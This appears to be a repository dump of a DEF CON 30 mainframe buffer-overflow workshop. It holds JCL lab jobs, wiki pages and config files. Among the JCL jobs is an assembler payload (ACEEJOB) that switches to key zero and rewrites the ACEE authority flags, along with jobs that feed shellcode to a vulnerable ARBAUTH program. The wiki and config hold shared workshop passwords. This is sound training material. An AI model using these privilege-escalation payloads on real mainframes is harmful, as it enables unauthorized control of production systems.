NAME=LAB08,LIST=ALL 212 | //{usern}LAB8 JOB (TSO), 213 | // 'COMP WTOPOC', 214 | // CLASS=A, 215 | // MSGCLASS=H, 216 | // MSGLEVEL=(2,1), 217 | // REGION=0K, 218 | // NOTIFY=&SYSUID 219 | //ASMLKD1 EXEC ASMFCL, 220 | // PARM.ASM='OBJECT,NODECK,TERM,XREF(SHORT)', 221 | // PARM.LKED='LET,MAP,XREF,LIST,TEST' 222 | //ASM.SYSLIB DD DSN=SYS1.MACLIB,DISP=SHR 223 | // DD DSN=SYS2.MACLIB,DISP=SHR 224 | // DD DSN=SYS1.AMODGEN,DISP=SHR 225 | // DD 
DSN=SYS1.AMACLIB,DISP=SHR 226 | //ASM.SYSTERM DD SYSOUT=* 227 | //ASM.SYSTERM DD SYSOUT=* 228 | //ASM.SYSIN DD *,DLM=@@ 229 | WTOPOC CSECT 230 | * 231 | * PREFIX TO SIMULATE R14 RETURN 232 | * 233 | LR R14,R15 234 | LA R14,16(R14) 235 | BC 15,0(,R14) 236 | NOPR 0 237 | EYE4 DC XL4'CAFEBABE' 238 | USING *,R12 239 | * 240 | * WTO AND THEN EXIT 241 | * 242 | COPY LR R12,R14 243 | LA R1,MSGWTO 244 | SVC 35 245 | SVC 03 246 | MSGWTO DC XL4'00100000' 247 | DC C'WTO HAS RUN!' 248 | EYE1 DC XL4'CAFEBABE' 249 | YREGS 250 | END WTOPOC CSECT 251 | @@ 252 | //LKED.SYSLMOD DD DSN={usern}.LOAD(WTOPOC),DISP=SHR 253 | //LKED.SYSPRINT DD SYSOUT=* 254 | ./ ADD NAME=LAB09,LIST=ALL 255 | //{usern}LAB9 JOB (TSO), 256 | // 'RUN ARBAUTH', 257 | // CLASS=A, 258 | // MSGCLASS=H, 259 | // MSGLEVEL=(2,1), 260 | // REGION=0K, 261 | // NOTIFY=&SYSUID 262 | //ARBAUTH EXEC PGM=ARBAUTH, 263 | // PARM='IEFBR14 ' 264 | //SYSPRINT DD SYSOUT=* 265 | //STEPLIB DD DISP=SHR,DSN=SYS2.LINKLIB 266 | // DD DISP=SHR,DSN=SYSC.LINKLIB 267 | //SYSUDUMP DD SYSOUT=* 268 | ./ ADD NAME=LAB10,LIST=ALL 269 | //{usern}LB10 JOB (TSO), 270 | // 'Exploit ARBAUTH', 271 | // CLASS=A, 272 | // MSGCLASS=H, 273 | // MSGLEVEL=(2,1), 274 | // REGION=0K, 275 | // NOTIFY=&SYSUID 276 | //ARBAUTH EXEC PGM=ARBAUTH, 277 | // PARM='OPENTST ' 278 | //SYSPRINT DD SYSOUT=A 279 | //STEPLIB DD DISP=SHR,DSN=SYS2.LINKLIB 280 | // DD DISP=SHR,DSN=SYSC.LINKLIB 281 | //SYSUDUMP DD DISP=SHR,DSN={usern}.DUMP004 282 | //INPUTDD DD DISP=SHR,DSN={usern}.OVERFLOW.ARBAUTH(SHELCODE) 283 | ./ ADD NAME=LAB11,LIST=ALL 284 | //{usern}LB11 JOB (TSO), 285 | // 'COMP ACEEJOB', 286 | // CLASS=A, 287 | // MSGCLASS=H, 288 | // MSGLEVEL=(2,1), 289 | // REGION=0K, 290 | // NOTIFY=&SYSUID 291 | //ASMLKD1 EXEC ASMFCL, 292 | // PARM.ASM='OBJECT,NODECK,TERM,XREF(SHORT)', 293 | // PARM.LKED='LET,MAP,XREF,LIST,TEST' 294 | //ASM.SYSLIB DD DSN=SYS1.MACLIB,DISP=SHR 295 | // DD DSN=SYS2.MACLIB,DISP=SHR 296 | // DD DSN=SYS1.AMODGEN,DISP=SHR 297 | // DD 
DSN=SYS1.AMACLIB,DISP=SHR 298 | //ASM.SYSTERM DD SYSOUT=* 299 | //ASM.SYSTERM DD SYSOUT=* 300 | //ASM.SYSIN DD DATA,DLM=@@ 301 | ACEEJOB CSECT 302 | * 303 | * PREFIX TO SIMULATE R14 RETURN 304 | * 305 | LR R14,R15 306 | LA R14,16(R14) 307 | BC 15,0(,R14) 308 | NOPR 0 309 | EYE4 DC XL4'CAFEBABE' 310 | USING *,R12 311 | * 312 | * ENTER KEY ZERO 313 | * 314 | COPY LR R12,R14 315 | LA R1,60 316 | * MODESET KEY=ZERO,MODE=SUP 317 | SVC 107 318 | * 319 | * LOAD ACEE 320 | * 321 | L R5,X'224' POINTER TO ASCB 322 | L R5,X'6C'(R5) POINTER TO ASXB 323 | L R5,X'C8'(R5) POINTER TO ACEE 324 | * 325 | * WRITE ACEE 326 | * 327 | NI X'26'(R5),X'00' 328 | OI X'26'(R5),X'B1' 329 | * 330 | * EXIT 331 | * 332 | LA R1,MSGCOMPL 333 | SVC 35 334 | SVC 03 335 | MSGCOMPL DC XL4'00140000' 336 | DC C'WRITING COMPLETE' 337 | EYE1 DC XL4'CAFEBABE' 338 | YREGS 339 | END 340 | @@ 341 | //LKED.SYSLMOD DD DSN={usern}.LOAD(ACEEJOB),DISP=SHR 342 | //LKED.SYSPRINT DD SYSOUT=* 343 | ./ ADD NAME=LAB12,LIST=ALL 344 | //{usern}LB12 JOB (TSO), 345 | // 'PRIVESC', 346 | // CLASS=A, 347 | // MSGCLASS=H, 348 | // MSGLEVEL=(2,1), 349 | // REGION=0K, 350 | // NOTIFY=&SYSUID 351 | //ARBAUTH EXEC PGM=ARBAUTH, 352 | // PARM='OPENTST ' 353 | //SYSPRINT DD SYSOUT=* 354 | //STEPLIB DD DISP=SHR,DSN=SYS2.LINKLIB 355 | // DD DISP=SHR,DSN=SYSC.LINKLIB 356 | //SYSUDUMP DD DISP=SHR,DSN={usern}.DUMP004 357 | //INPUTDD DD DISP=SHR,DSN={usern}.OVERFLOW.ARBAUTH(PRIVESC) 358 | //STEP01 EXEC PGM=IEBGENER,COND=EVEN 359 | //SYSPRINT DD SYSOUT=* 360 | //SYSIN DD DUMMY 361 | //SYSUT1 DD DSN=WHITE.RABBIT(SCRIPT),DISP=SHR 362 | //SYSUT2 DD SYSOUT=* 363 | //SYSTSPRT DD SYSOUT=* 364 | ./ ADD NAME=LAB13,LIST=ALL 365 | //{usern}LB13 JOB (TSO), 366 | // 'COMP WTOSML', 367 | // CLASS=A, 368 | // MSGCLASS=H, 369 | // MSGLEVEL=(2,1), 370 | // REGION=0K, 371 | // NOTIFY=&SYSUID 372 | //ASMLKD1 EXEC ASMFCL, 373 | // PARM.ASM='OBJECT,NODECK,TERM,XREF(SHORT)', 374 | // PARM.LKED='LET,MAP,XREF,LIST,TEST' 375 | //ASM.SYSLIB DD 
DSN=SYS1.MACLIB,DISP=SHR 376 | // DD DSN=SYS2.MACLIB,DISP=SHR 377 | // DD DSN=SYS1.AMODGEN,DISP=SHR 378 | // DD DSN=SYS1.AMACLIB,DISP=SHR 379 | //ASM.SYSTERM DD SYSOUT=* 380 | //ASM.SYSTERM DD SYSOUT=* 381 | //ASM.SYSIN DD DATA,DLM=@@ 382 | WTOSML CSECT 383 | * 384 | * PREFIX TO SIMULATE R14 RETURN 385 | * 386 | LR R14,R15 387 | LA R14,16(R14) 388 | BC 15,6(,R14) 389 | NOPR 0 390 | EYE4 DC XL4'CAFEBABE' 391 | USING *,R14 392 | * 393 | * WTO AND THEN EXIT 394 | * 395 | DS XL6 396 | COPY LA R1,MSGWTO 397 | SVC 35 398 | SVC 03 399 | MSGWTO DC XL4'000C0000' 400 | DC C'RINGRING' 401 | EYE1 DC XL4'CAFEBABE' 402 | YREGS 403 | END 404 | @@ 405 | //LKED.SYSLMOD DD DSN={usern}.LOAD(WTOSML),DISP=SHR 406 | //LKED.SYSPRINT DD SYSOUT=* 407 | ./ ADD NAME=LAB14,LIST=ALL 408 | //{usern}LB14 JOB (TSO), 409 | // 'COMP WTOSML', 410 | // CLASS=A, 411 | // MSGCLASS=H, 412 | // MSGLEVEL=(2,1), 413 | // REGION=0K, 414 | // NOTIFY=&SYSUID 415 | //ASMLKD1 EXEC ASMFCL, 416 | // PARM.ASM='OBJECT,NODECK,TERM,XREF(SHORT)', 417 | // PARM.LKED='LET,MAP,XREF,LIST,TEST' 418 | //ASM.SYSLIB DD DSN=SYS1.MACLIB,DISP=SHR 419 | // DD DSN=SYS2.MACLIB,DISP=SHR 420 | // DD DSN=SYS1.AMODGEN,DISP=SHR 421 | // DD DSN=SYS1.AMACLIB,DISP=SHR 422 | //ASM.SYSTERM DD SYSOUT=* 423 | //ASM.SYSTERM DD SYSOUT=* 424 | //ASM.SYSIN DD DATA,DLM=@@ 425 | AWTOXOR CSECT 426 | * 427 | * PREFIX TO SIMULATE R14 RETURN 428 | * 429 | LR R14,R15 430 | LA R14,16(R14) 431 | BC 15,0(,R14) 432 | NOPR 0 433 | EYE4 DC XL4'CAFEBABE' 434 | USING *,R14 435 | * 436 | * ENTER XOR BYTES 437 | * 438 | COPY XC WTOJOBX,XORKEY 439 | * 440 | * WTOSML XORED 441 | * USING *,R14 442 | * DS XL6 443 | * LA R1,MSGWTO 444 | * SVC 35 445 | * SVC 03 446 | * DC XL4'00070000' 447 | * DC C'WTO' 448 | * 449 | WTOJOBX DS 0XL21 450 | DC X'' 451 | * 452 | * XOR KEY 453 | * 454 | XORKEY DS 0XL21 455 | DC X'' 456 | EYE1 DC XL4'CAFEBABE' 457 | YREGS 458 | END 459 | @@ 460 | //LKED.SYSLMOD DD DSN={usern}.LOAD(WTOSMLX),DISP=SHR 461 | //LKED.SYSPRINT DD SYSOUT=* 462 | ./ 
ADD NAME=BONUS01,LIST=ALL 463 | //BONUS01 JOB (TSO), 464 | // 'RUN FIXDSCB', 465 | // CLASS=A, 466 | // MSGCLASS=H, 467 | // MSGLEVEL=(1,1), 468 | // REGION=0K 469 | //FIXDSCB EXEC PGM=FIXDSCB 470 | //SYSPRINT DD SYSOUT=A 471 | //STEPLIB DD DISP=SHR,DSN=SYSC.LINKLIB 472 | //SYSIN DD * 473 | EXTEND VOLUME=MVSRES,DSNAME=SYS1.LINKLIB 474 | //* 475 | $$ 476 | ''') 477 | 478 | for x in range(0,23): 479 | with open("users/DC{}.jcl".format(str(x).zfill(2)), 'w') as jclfile: 480 | print("*** Writting users/DC{}.jcl".format(str(x).zfill(2))) 481 | jclfile.write(USERJOB.format(usern="DC{}".format(str(x).zfill(2)))) 482 | 483 | -------------------------------------------------------------------------------- /vtam_screen.ans: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/vtam_screen.ans -------------------------------------------------------------------------------- /web3270.ini: -------------------------------------------------------------------------------- 1 | [tn3270] 2 | ;web3270 config file 3 | server_ip = 127.0.0.1 4 | server_port = 3270 5 | ; should the connection be encrypted 6 | encrypted = no 7 | ; enables -noverifycert 8 | selfsignedcert = no 9 | ; tn3270 model type 10 | model = 4 11 | ; to use proxies change below to yes and uncomment the proxystring 12 | ; and adjust as needed 13 | useproxy = no 14 | ;proxystring = socks5d:fred:secret@localhost:12345 15 | 16 | [web] 17 | webport = 8443 18 | tls = yes 19 | ; use this to set a password required to access the web app 20 | ; if this line is commented out, no password is required 21 | password = D3FC0N 22 | ; This is used for secure cookies. 
If you do not set one 23 | ; this script will set one for you 24 | secret = -------------------------------------------------------------------------------- /wiki/start_tiddlywiki.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | set -e 3 | 4 | cd /var/lib/tiddlywiki 5 | 6 | tiddlywiki_script=$(readlink -f $(which tiddlywiki)) 7 | 8 | if [ -n "$NODE_MEM" ]; then 9 | # Based on rule of thumb from: 10 | # http://fiznool.com/blog/2016/10/01/running-a-node-dot-js-app-in-a-low-memory-environment/ 11 | mem_node_old_space=$((($NODE_MEM*4)/5)) 12 | NODEJS_V8_ARGS="--max_old_space_size=$mem_node_old_space $NODEJS_V8_ARGS" 13 | fi 14 | 15 | if [ ! -d /var/lib/tiddlywiki/mywiki ]; then 16 | /usr/bin/env node $NODEJS_V8_ARGS $tiddlywiki_script mywiki --init server 17 | 18 | mkdir /var/lib/tiddlywiki/mywiki/tiddlers 19 | fi 20 | 21 | # Configure listen command, see https://tiddlywiki.com/static/ListenCommand.html 22 | listen_params="host=0.0.0.0 port=8080" 23 | listen_params="$listen_params debug-level=${DEBUG_LEVEL-none}" 24 | 25 | if [ -n "$PATH_PREFIX" ]; then 26 | listen_params="$listen_params path-prefix=$PATH_PREFIX" 27 | fi 28 | 29 | if [ -n "$USERNAME" ]; then 30 | listen_params="$listen_params username=$USERNAME" 31 | listen_params="$listen_params password=${PASSWORD-wiki}" 32 | fi 33 | 34 | if [ -n "$CLASS" ]; then 35 | listen_params="$listen_params credentials=/auth/users.txt readers=defcon writers=phil,jake" 36 | fi 37 | 38 | # Start the tiddlywiki server 39 | exec /usr/bin/env node $NODEJS_V8_ARGS $tiddlywiki_script mywiki --listen $listen_params -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/$__DefaultTiddlers.tid: -------------------------------------------------------------------------------- 1 | created: 20220731225500219 2 | modified: 20220805061145182 3 | title: $:/DefaultTiddlers 4 | type: text/vnd.tiddlywiki 5 | 6 | [[Welcome DEF CON 30!]] 
7 | [[Getting Started]] 8 | [[Lab 1 - Run HELLO]] 9 | [[Lab 2 - First Overflow]] 10 | [[Lab 3 - Find our return address]] 11 | [[Lab 4 - Exploit!]] 12 | [[Lab 5 - OPENTST]] 13 | [[Lab 6 - De Brujin]] 14 | [[Lab 7 - De Brujin Overflow]] 15 | [[Lab 8 - Add our own Shell Code]] 16 | [[Lab 9 - Privesc with ARBAUTH]] 17 | [[Lab 10 - FTP Buffer Overflow]] 18 | [[Lab 11 - 2 Crash 2 Furious]] 19 | [[Lab 12 - Hackers Returns]] 20 | [[Lab 13 - Not So Fast There]] 21 | [[Lab 14 - Sockets and EBCDIC]] 22 | [[Lab 15 - RCE]] 23 | [[ASCII/EBCDIC Table]] 24 | -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/$__Import.tid: -------------------------------------------------------------------------------- 1 | created: 20220804225613332 2 | modified: 20220804225613332 3 | status: complete 4 | title: $:/Import 5 | type: text/vnd.tiddlywiki 6 | 7 | The following tiddlers were imported: 8 | 9 | # [[title.jpg]] -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/$__SiteSubtitle.tid: -------------------------------------------------------------------------------- 1 | created: 20220724190232011 2 | modified: 20220801071843171 3 | title: $:/SiteSubtitle 4 | type: text/vnd.tiddlywiki 5 | 6 | A DEFCON 30 Workshop -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/$__SiteTitle.tid: -------------------------------------------------------------------------------- 1 | created: 20220724190215134 2 | modified: 20220801071843192 3 | title: $:/SiteTitle 4 | type: text/vnd.tiddlywiki 5 | 6 | Mainframe Buffer Overflows -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/$__StoryList.tid: -------------------------------------------------------------------------------- 1 | created: 20220805232041997 2 | list: [[Welcome DEF CON 30!]] [[Getting Started]] [[Lab 
1 - Run HELLO]] [[Lab 2 - First Overflow]] [[Lab 3 - Find our return address]] [[Lab 4 - Exploit!]] [[Lab 5 - OPENTST]] [[Lab 6 - De Brujin]] [[Lab 7 - De Brujin Overflow]] [[Lab 8 - Add our own Shell Code]] [[Lab 9 - Privesc with ARBAUTH]] [[Lab 10 - FTP Buffer Overflow]] [[Lab 11 - 2 Crash 2 Furious]] [[Lab 12 - Hackers Returns]] [[Lab 13 - Not So Fast There]] [[Lab 14 - Sockets and EBCDIC]] [[Lab 15 - RCE]] [[ASCII/EBCDIC Table]] 3 | modified: 20220805232041997 4 | title: $:/StoryList 5 | type: text/vnd.tiddlywiki -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/$__config_PageControlButtons_Visibility_$__core_ui_Buttons_control-panel.tid: -------------------------------------------------------------------------------- 1 | created: 20220804232957942 2 | modified: 20220805060101023 3 | title: $:/config/PageControlButtons/Visibility/$:/core/ui/Buttons/control-panel 4 | type: text/vnd.tiddlywiki 5 | 6 | show -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/$__config_PageControlButtons_Visibility_$__core_ui_Buttons_export-page.tid: -------------------------------------------------------------------------------- 1 | created: 20220804233021302 2 | modified: 20220804233021315 3 | title: $:/config/PageControlButtons/Visibility/$:/core/ui/Buttons/export-page 4 | type: text/vnd.tiddlywiki 5 | 6 | show -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/$__config_PageControlButtons_Visibility_$__core_ui_Buttons_home.tid: -------------------------------------------------------------------------------- 1 | created: 20220724193626605 2 | modified: 20220801071842567 3 | title: $:/config/PageControlButtons/Visibility/$:/core/ui/Buttons/home 4 | type: text/vnd.tiddlywiki 5 | 6 | show -------------------------------------------------------------------------------- 
/wiki/tiddlywiki/mywiki/tiddlers/$__config_PageControlButtons_Visibility_$__core_ui_Buttons_import.tid: -------------------------------------------------------------------------------- 1 | created: 20220724193816629 2 | modified: 20220804232956803 3 | title: $:/config/PageControlButtons/Visibility/$:/core/ui/Buttons/import 4 | type: text/vnd.tiddlywiki 5 | 6 | hide -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/$__config_PageControlButtons_Visibility_$__core_ui_Buttons_new-image.tid: -------------------------------------------------------------------------------- 1 | created: 20220724193606623 2 | modified: 20220801071842633 3 | title: $:/config/PageControlButtons/Visibility/$:/core/ui/Buttons/new-image 4 | type: text/vnd.tiddlywiki 5 | 6 | hide -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/$__config_PageControlButtons_Visibility_$__core_ui_Buttons_new-tiddler.tid: -------------------------------------------------------------------------------- 1 | created: 20220804232955309 2 | modified: 20220804232955327 3 | title: $:/config/PageControlButtons/Visibility/$:/core/ui/Buttons/new-tiddler 4 | type: text/vnd.tiddlywiki 5 | 6 | hide -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/$__config_PageControlButtons_Visibility_$__core_ui_Buttons_theme.tid: -------------------------------------------------------------------------------- 1 | created: 20220724193641332 2 | modified: 20220804233005533 3 | title: $:/config/PageControlButtons/Visibility/$:/core/ui/Buttons/theme 4 | type: text/vnd.tiddlywiki 5 | 6 | hide -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/$__themes_tiddlywiki_vanilla_metrics_storyright.tid: -------------------------------------------------------------------------------- 1 | created: 
20220731225332922 2 | modified: 20220801071843220 3 | title: $:/themes/tiddlywiki/vanilla/metrics/storyright 4 | type: text/vnd.tiddlywiki 5 | 6 | px -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/$__themes_tiddlywiki_vanilla_metrics_storywidth.tid: -------------------------------------------------------------------------------- 1 | created: 20220731225339508 2 | modified: 20220804225756730 3 | title: $:/themes/tiddlywiki/vanilla/metrics/storywidth 4 | type: text/vnd.tiddlywiki 5 | 6 | 900px -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/$__themes_tiddlywiki_vanilla_metrics_tiddlerwidth.tid: -------------------------------------------------------------------------------- 1 | created: 20220731225227294 2 | modified: 20220804225759740 3 | title: $:/themes/tiddlywiki/vanilla/metrics/tiddlerwidth 4 | type: text/vnd.tiddlywiki 5 | 6 | 900px -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/ASCII_EBCDIC Table.tid: -------------------------------------------------------------------------------- 1 | created: 20220804215340636 2 | modified: 20220804215354837 3 | tags: 4 | title: ASCII/EBCDIC Table 5 | type: text/vnd.tiddlywiki 6 | 7 | ``` 8 | ASCII Entries: 254 EBCDIC Entries: 254 9 | ascii : 01 02 03 04 05 06 07 08 09 0B 0C 0D 0E 0F 10 11 10 | ebcdic: 01 02 03 37 2D 2E 2F 16 05 0B 0C 0D 0E 0F 10 11 11 | 12 | ascii : 12 13 14 15 16 17 18 19 1A 1B 1C 1D 1E 1F 20 21 13 | ebcdic: 12 13 3C 3D 32 26 18 19 3F 27 1C 1D 1E 1F 40 5A 14 | 15 | ascii : 22 23 24 25 26 27 28 29 2A 2B 2C 2D 2E 2F 30 31 16 | ebcdic: 7F 7B 5B 6C 50 7D 4D 5D 5C 4E 6B 60 4B 61 F0 F1 17 | 18 | ascii : 32 33 34 35 36 37 38 39 3A 3B 3C 3D 3E 3F 40 41 19 | ebcdic: F2 F3 F4 F5 F6 F7 F8 F9 7A 5E 4C 7E 6E 6F 7C C1 20 | 21 | ascii : 42 43 44 45 46 47 48 49 4A 4B 4C 4D 4E 4F 50 51 22 | ebcdic: C2 C3 C4 C5 C6 C7 C8 C9 D1 D2 
D3 D4 D5 D6 D7 D8 23 | 24 | ascii : 52 53 54 55 56 57 58 59 5A 5B 5C 5D 5E 5F 60 61 25 | ebcdic: D9 E2 E3 E4 E5 E6 E7 E8 E9 AD E0 BD 5F 6D 79 81 26 | 27 | ascii : 62 63 64 65 66 67 68 69 6A 6B 6C 6D 6E 6F 70 71 28 | ebcdic: 82 83 84 85 86 87 88 89 91 92 93 94 95 96 97 98 29 | 30 | ascii : 72 73 74 75 76 77 78 79 7A 7B 7C 7D 7E 7F 80 81 31 | ebcdic: 99 A2 A3 A4 A5 A6 A7 A8 A9 C0 4F D0 A1 07 20 21 32 | 33 | ascii : 82 83 84 85 86 87 88 89 8A 8B 8C 8D 8E 8F 90 91 34 | ebcdic: 22 23 24 25 06 17 28 29 2A 2B 2C 09 0A 1B 30 31 35 | 36 | ascii : 92 93 94 95 96 97 98 99 9A 9B 9C 9D 9E 9F A0 A1 37 | ebcdic: 1A 33 34 35 36 08 38 39 3A 3B 04 14 3E FF 41 AA 38 | 39 | ascii : A2 A3 A4 A5 A6 A7 A8 A9 AA AB AC AD AE AF B0 B1 40 | ebcdic: 4A B1 9F B2 6A B5 BB B4 9A 8A B0 CA AF BC 90 8F 41 | 42 | ascii : B2 B3 B4 B5 B6 B7 B8 B9 BA BB BC BD BE BF C0 C1 43 | ebcdic: EA FA BE A0 B6 B3 9D DA 9B 8B B7 B8 B9 AB 64 65 44 | 45 | ascii : C2 C3 C4 C5 C6 C7 C8 C9 CA CB CC CD CE CF D0 D1 46 | ebcdic: 62 66 63 67 9E 68 74 71 72 73 78 75 76 77 AC 69 47 | 48 | ascii : D2 D3 D4 D5 D6 D7 D8 D9 DA DB DC DD DE DF E0 E1 49 | ebcdic: ED EE EB EF EC BF 80 FD FE FB FC BA AE 59 44 45 50 | 51 | ascii : E2 E3 E4 E5 E6 E7 E8 E9 EA EB EC ED EE EF F0 F1 52 | ebcdic: 42 46 43 47 9C 48 54 51 52 53 58 55 56 57 8C 49 53 | 54 | ascii : F2 F3 F4 F5 F6 F7 F8 F9 FA FB FC FD FE FF 55 | ebcdic: CD CE CB CF CC E1 70 DD DE DB DC 8D 8E DF 56 | ``` -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Getting Started.tid: -------------------------------------------------------------------------------- 1 | created: 20220724190305762 2 | modified: 20220805061237307 3 | tags: 4 | title: Getting Started 5 | type: text/vnd.tiddlywiki 6 | 7 | !! Labs Docker Container 8 | 9 | If you're not in the DEF CON 30 workshop you will have to run these labs yourself in Docker. 
The command below will deploy the container for you: 10 | 11 | This is a minimal container, with the fewest ports/volumes. This is all you'll need for the class. 12 | 13 | ``` 14 | docker run -d \ 15 | --name=defcon30 \ 16 | -e HUSER=defcon \ 17 | -e HPASS=defcon \ 18 | -p 2323:3223 \ 19 | -p 8888:8888 \ 20 | -p 2121-2141:2121-2141 \ 21 | -p 8443:8443 \ 22 | -p 8080:8080 \ 23 | -p 31337-31347:31337-31347 \ 24 | -v ~/dumps:/printers \ 25 | --restart unless-stopped \ 26 | mainframed767/defcon30:prerelease 27 | ``` 28 | 29 | Ports explained: 30 | 31 | * 2323: 3270 server port 32 | * 8443: Web based tn3270 client, the secret is `D3FC0N` 33 | * 8888: Hercules console web server. Username/password: `defcon` 34 | * 8080: This wiki 35 | * 2121-2141 & 31337-31347: Port ranges used by the FTP server 36 | 37 | For more information about the container see https://github.com/mainframed/DC30_Workshop 38 | 39 | !! Notes 40 | 41 | * If you want to keep a copy of this wiki locally you can click the ''Export'' button to save a copy locally (it's next to the home button) 42 | * If you accidentally close a page, clicking the home button will bring them all back 43 | 44 | !! Logging On 45 | 46 | Either connect to web3270 at https://localhost:8443 or https://dc30.soldieroffortran.org:8443 (the secret is `D3FC0N`), or use your own 3270 client (x3270, c3270 and pw3270 are all great open source clients). If using your own client the TN3270 server port is ''2323'': `x3270 -noverifycert L:localhost:2323` 47 | 48 | If you encounter a screen like this: 49 | 50 | [img[Screenshot_2022-07-24_12-32-18.png]] 51 | 52 | It tells you to `CLEAR` the screen. To do that in web3270 (and x3270/c3270), click on `Keyboard` and then click `CLEAR`: 53 | 54 | [img[Screenshot_2022-07-24_12-32-44.png]] 55 | 56 | Afterwards you should see 57 | 58 | [img[Screenshot_2022-07-24_12-41-23.png]] 59 | 60 | To log on enter your username, which is in the range `DC00` through `DC22`. 
The password is the same as the username. If you would like to change your password, after logging in you type: `LOGON username/current password/new password`.
type: text/vnd.tiddlywiki 6 | 7 | !! Log in and launch ISPF 8 | 9 | If running the workshop container locally use one of: 10 | 11 | * https://localhost:8443 (The secret is `D3FC0N`) 12 | * `x3270 -noverifycert L:localhost:2323` 13 | 14 | Otherwise you can connect to the class workshop: 15 | 16 | * https://dc30.soldieroffortran.org:8443 (The secret is `D3FC0N`) 17 | * `x3270 -noverifycert L:dc30.soldieroffortran.org:2323` 18 | 19 | Once connected logon with your assigned userid (`DC00` through `DC22` the password is the same as your username). This gets you logged on to TSO. 20 | 21 | To change your user id, at the `READY` prompt type `LOGON //`. The limit is 8 characters, alpha/numeric/special. For example to change the password for the user DC00: `LOGON DC00/DC00/D3FC0NPW`. ''Note'' Max length is 8 and only certain special characters are supported. 22 | 23 | !! Run the Hello Program 24 | 25 | ⚠️ ''Note'' ⚠️: Anywhere you see `` replace it with your assigned (or chosen) user id. For example, if my userid is `DC00` then i would substitute `.LOAD` with `DC00.LOAD` 26 | 27 | The program `HELLO` has been installed in `.LOAD`. This is called a Partitioned Dataset (PDS). To run a program in TSO you CALL it: `CALL '.LOAD(HELLO)'`. 28 | 29 | Before you run the program clear the screen with the command `CLS`. 30 | 31 | Now run the hello program replacing `` with your ID: `CALL '.LOAD(HELLO)'` ⚠️''WARNING'' Make sure you include the single quotes. ⚠️ 32 | 33 | 34 | 35 | ''Note:'' You can copy/paste with x3270 but you can only paste in to web3270 36 | 37 | !! ISPF Primer 38 | 39 | To access and edit files you use ISPF. ISPF allows you to browse, create, and edit files. It also allows you to see the output from jobs. 40 | 41 | To access ISPF you use the TSO command `ISPF`. 42 | [img[Screenshot_2022-07-31_11-06-42.png]] 43 | 44 | To access the file browser you use option 3 then option 4. As a shorthand you can do both at the same time by using `.`. 
So instead of typing `3` followed by enter and `4` followed by enter you type `3.4` and enter. To access the file browser from anywhere in ISPF you can prepend `=`: `=3.4` 45 | 46 | To access job output you use option 3 followed by option 8. Again this can be shortened to `3.8`. 47 | 48 | ISPF also allows for more than one "window". Pressing `F2` on your keyboard will open another screen. You cycle through these screens with `F9`. 49 | 50 | When you get stuck (you will) you can exit the current program/window/screen by pressing `F3`. If your keyboard gets "stuck" (you cannot enter text) simply hit the tab button. If you cannot get un stuck we will help you, don't worry. Everyone will likely get stuck at some point. Don't sweat it. 51 | 52 | !! Access LAB01 JCL 53 | 54 | # From ISPF access the file browser with `=3.4` 55 | # Where it says `Data set name prefix ==>` you will type your userid and hit enter 56 | # In the `S` column move your cursor down to `.JCLLIB`, type the letter `E` and hit enter. [img[image_edit.png]] 57 | # Hit the `TAB` button until your cursor is in front of `LAB01`, type `E` again and hit enter [img[emem.png]] 58 | 59 | This is the ISPF editor. 60 | 61 | [img[editor.png]] 62 | 63 | !! ISPF Editor Primer 64 | 65 | * To exit hit `F3` or type `END` on the `Command ==>` line. ''WARNING'' this will auto save any changes you've made. To not save changes type `CANCEL` on the command line instead 66 | * To insert a line type `I` in the column with the numbers under the six red `*`. To add more than one line add a number. `I30` adds 30 lines. 67 | * To edit lines just write over them. 68 | * To go a page up in the editor you press `F7` 69 | * To page down you press `F8` 70 | * To move left/right press `F10`/`F11` 71 | 72 | !! Edit the job and submit it 73 | 74 | # With `.JCLLIB(LAB01)` opened change line 10, replace `TESTRUN` with your userid and hit enter 75 | # On the `Command ==>` line type `SAVE`, hit enter, then `SUBMIT` and hit enter. 
Hit enter a few times and you'll eventually get `MAX COND CODE 0000` which means the job was successfully run 76 | 77 | !! Viewing the job output 78 | 79 | # Press `F2` to open a new screen 80 | # On the `OPTION ===>` line type `=3.8` 81 | # On the `Command ===>` line type `ST `. E.G. `ST DC09` 82 | # Move your cursor (with tab or arrow keys) until it is in the `S` column in front of `LAB1` (e.g. `DC09LAB1`) 83 | # Place an `S` in that column in front of the job and hit enter 84 | [img[image.png]] 85 | 86 | 87 | This is the job output. If you scroll to the bottom by pressing `F8` you will see the same output as we did from TSO 88 | 89 | [img[Joblogheader.png]] 90 | 91 | [img[Screenshot_2022-07-31_11-32-55.png]] 92 | 93 | 94 | ! Bonus 95 | 96 | If you've finished this lab early why not check out what are in some of the other partitioned datasets that start with your HLQ. Hitting `F9` to get back to the editor and hitting `F3` twice will take you there. -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Lab 10 - FTP Buffer Overflow.tid: -------------------------------------------------------------------------------- 1 | created: 20220801161821424 2 | modified: 20220805164759119 3 | tags: 4 | title: Lab 10 - FTP Buffer Overflow 5 | type: text/vnd.tiddlywiki 6 | 7 | [img[Screenshot_2022-08-01_09-28-19.png]] 8 | 9 | !!! This lab and all following labs must be done on your local docker image they will ''NOT'' work on the cloud mainframe. We already patched that 😈 10 | 11 | !! 
